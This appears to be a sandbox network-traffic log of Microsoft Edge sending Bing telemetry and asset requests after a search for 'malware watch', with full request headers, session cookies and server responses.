GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f39d
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f3a0
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627102%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627103%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627106%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1738274627108%2C%22Name%22%3A503%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627108%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627113%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627102%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627103%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627106%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1738274627108%2C%22Name%22%3A503%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627108%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627113%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f3a3
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627113%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1738274627113%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627113%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1738274627113%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2940
cache-control: public, max-age=1209555
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f3a8
x-check-cacheable: YES
-
Remote address:88.221.135.16:443RequestGET /rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 679bf7444414475cb3e2e38581d012ec
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-mKXZ8KieBa+wqDBNsCDHklL+GhpQjMIP72Q+POM4S88='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 4770DDA8038344C7865B7DF49201EC4D Ref B: LON601060101040 Ref C: 2025-01-30T22:03:48Z
date: Thu, 30 Jan 2025 22:03:48 GMT
set-cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D; expires=Tue, 24-Feb-2026 22:03:48 GMT; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:48 GMT; path=/; secure; SameSite=None
set-cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:48 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHS=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: SRCHS=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f39c
-
Remote address:88.221.135.16:443RequestGET /rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
